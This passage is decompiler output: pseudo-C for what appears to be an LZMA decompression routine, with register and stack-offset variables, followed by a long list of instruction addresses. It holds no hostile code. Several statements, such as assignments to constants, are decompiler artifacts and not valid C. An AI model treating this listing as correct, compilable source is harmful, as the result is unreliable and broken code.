											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}















                                                                                              0x00407194
                                                                                              0x00407194
                                                                                              0x00407194
                                                                                              0x00407194
                                                                                              0x0040719a
                                                                                              0x0040719e
                                                                                              0x004071a2
                                                                                              0x004071ac
                                                                                              0x004071ba
                                                                                              0x00407490
                                                                                              0x00407490
                                                                                              0x00407493
                                                                                              0x0040749a
                                                                                              0x004074c7
                                                                                              0x004074c7
                                                                                              0x004074cb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004074cd
                                                                                              0x004074d6
                                                                                              0x004074dc
                                                                                              0x004074df
                                                                                              0x004074e2
                                                                                              0x004074e5
                                                                                              0x004074e8
                                                                                              0x004074ee
                                                                                              0x00407507
                                                                                              0x0040750a
                                                                                              0x00407516
                                                                                              0x00407517
                                                                                              0x0040751a
                                                                                              0x004074f0
                                                                                              0x004074f0
                                                                                              0x004074ff
                                                                                              0x00407502
                                                                                              0x00407502
                                                                                              0x00407524
                                                                                              0x004074c4
                                                                                              0x004074c4
                                                                                              0x004074c4
                                                                                              0x004074c7
                                                                                              0x004074cb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407526
                                                                                              0x00407526
                                                                                              0x0040749f
                                                                                              0x004074a3
                                                                                              0x004075db
                                                                                              0x004075db
                                                                                              0x004075e5
                                                                                              0x004075ed
                                                                                              0x004075f4
                                                                                              0x004075f6
                                                                                              0x004075fd
                                                                                              0x00407601
                                                                                              0x00407601
                                                                                              0x004074a9
                                                                                              0x004074af
                                                                                              0x004074b6
                                                                                              0x004074be
                                                                                              0x004074be
                                                                                              0x004074c1
                                                                                              0x00000000
                                                                                              0x004074c1
                                                                                              0x0040752b
                                                                                              0x00407538
                                                                                              0x0040753b
                                                                                              0x00407447
                                                                                              0x00407447
                                                                                              0x00407447
                                                                                              0x00406be3
                                                                                              0x00406be3
                                                                                              0x00406be3
                                                                                              0x00406bec
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406bf2
                                                                                              0x00406bf2
                                                                                              0x00000000
                                                                                              0x00406bf9
                                                                                              0x00406bfd
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406c03
                                                                                              0x00406c06
                                                                                              0x00406c09
                                                                                              0x00406c0c
                                                                                              0x00406c10
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406c16
                                                                                              0x00406c16
                                                                                              0x00406c19
                                                                                              0x00406c1b
                                                                                              0x00406c1c
                                                                                              0x00406c1f
                                                                                              0x00406c21
                                                                                              0x00406c22
                                                                                              0x00406c24
                                                                                              0x00406c27
                                                                                              0x00406c2c
                                                                                              0x00406c31
                                                                                              0x00406c3a
                                                                                              0x00406c4d
                                                                                              0x00406c50
                                                                                              0x00406c5c
                                                                                              0x00406c84
                                                                                              0x00406c86
                                                                                              0x00406c94
                                                                                              0x00406c94
                                                                                              0x00406c98
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406c88
                                                                                              0x00406c88
                                                                                              0x00406c8b
                                                                                              0x00406c8c
                                                                                              0x00406c8c
                                                                                              0x00000000
                                                                                              0x00406c88
                                                                                              0x00406c5e
                                                                                              0x00406c62
                                                                                              0x00406c67
                                                                                              0x00406c67
                                                                                              0x00406c70
                                                                                              0x00406c78
                                                                                              0x00406c7b
                                                                                              0x00000000
                                                                                              0x00406c81
                                                                                              0x00406c81
                                                                                              0x00000000
                                                                                              0x00406c81
                                                                                              0x00000000
                                                                                              0x00406c9e
                                                                                              0x00406c9e
                                                                                              0x00406ca2
                                                                                              0x0040754e
                                                                                              0x0040754e
                                                                                              0x00000000
                                                                                              0x0040754e
                                                                                              0x00406ca8
                                                                                              0x00406cab
                                                                                              0x00406cbb
                                                                                              0x00406cbe
                                                                                              0x00406cc1
                                                                                              0x00406cc1
                                                                                              0x00406cc1
                                                                                              0x00406cc4
                                                                                              0x00406cc8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406cca
                                                                                              0x00406cca
                                                                                              0x00406cd0
                                                                                              0x00406cfa
                                                                                              0x00406d00
                                                                                              0x00406d07
                                                                                              0x00000000
                                                                                              0x00406d07
                                                                                              0x00406cd2
                                                                                              0x00406cd6
                                                                                              0x00406cd9
                                                                                              0x00406cde
                                                                                              0x00406cde
                                                                                              0x00406ce9
                                                                                              0x00406cf1
                                                                                              0x00406cf4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406d39
                                                                                              0x00406d3f
                                                                                              0x00406d42
                                                                                              0x00406d4f
                                                                                              0x00406d57
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406d0e
                                                                                              0x00406d0e
                                                                                              0x00406d12
                                                                                              0x0040755d
                                                                                              0x0040755d
                                                                                              0x00000000
                                                                                              0x0040755d
                                                                                              0x00406d18
                                                                                              0x00406d1e
                                                                                              0x00406d29
                                                                                              0x00406d29
                                                                                              0x00406d29
                                                                                              0x00406d2c
                                                                                              0x00406d2f
                                                                                              0x00406d32
                                                                                              0x00406d37
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004073ce
                                                                                              0x004073ce
                                                                                              0x004073d4
                                                                                              0x004073da
                                                                                              0x004073e0
                                                                                              0x004073fa
                                                                                              0x004073fd
                                                                                              0x00407403
                                                                                              0x0040740e
                                                                                              0x0040740e
                                                                                              0x00407410
                                                                                              0x004073e2
                                                                                              0x004073e2
                                                                                              0x004073f1
                                                                                              0x004073f5
                                                                                              0x004073f5
                                                                                              0x0040741a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040741c
                                                                                              0x00407420
                                                                                              0x004075cf
                                                                                              0x004075cf
                                                                                              0x00000000
                                                                                              0x004075cf
                                                                                              0x00407426
                                                                                              0x0040742c
                                                                                              0x00407433
                                                                                              0x0040743b
                                                                                              0x0040743e
                                                                                              0x00407441
                                                                                              0x00407441
                                                                                              0x00407447
                                                                                              0x00407447
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406d5f
                                                                                              0x00406d5f
                                                                                              0x00406d61
                                                                                              0x00406d64
                                                                                              0x00406dd5
                                                                                              0x00406dd5
                                                                                              0x00406dd8
                                                                                              0x00406ddb
                                                                                              0x00406de2
                                                                                              0x00406dec
                                                                                              0x00000000
                                                                                              0x00406dec
                                                                                              0x00406d66
                                                                                              0x00406d66
                                                                                              0x00406d6a
                                                                                              0x00406d6d
                                                                                              0x00406d6f
                                                                                              0x00406d72
                                                                                              0x00406d75
                                                                                              0x00406d77
                                                                                              0x00406d7a
                                                                                              0x00406d7c
                                                                                              0x00406d81
                                                                                              0x00406d84
                                                                                              0x00406d87
                                                                                              0x00406d8b
                                                                                              0x00406d92
                                                                                              0x00406d95
                                                                                              0x00406d9c
                                                                                              0x00406da0
                                                                                              0x00406da8
                                                                                              0x00406da8
                                                                                              0x00406da8
                                                                                              0x00406da2
                                                                                              0x00406da2
                                                                                              0x00406da2
                                                                                              0x00406d97
                                                                                              0x00406d97
                                                                                              0x00406d97
                                                                                              0x00406dac
                                                                                              0x00406daf
                                                                                              0x00406dcd
                                                                                              0x00406dcd
                                                                                              0x00406dcf
                                                                                              0x00000000
                                                                                              0x00406db1
                                                                                              0x00406db1
                                                                                              0x00406db1
                                                                                              0x00406db4
                                                                                              0x00406db7
                                                                                              0x00406dba
                                                                                              0x00406dbc
                                                                                              0x00406dbc
                                                                                              0x00406dbc
                                                                                              0x00406dbf
                                                                                              0x00406dc2
                                                                                              0x00406dc4
                                                                                              0x00406dc5
                                                                                              0x00406dc8
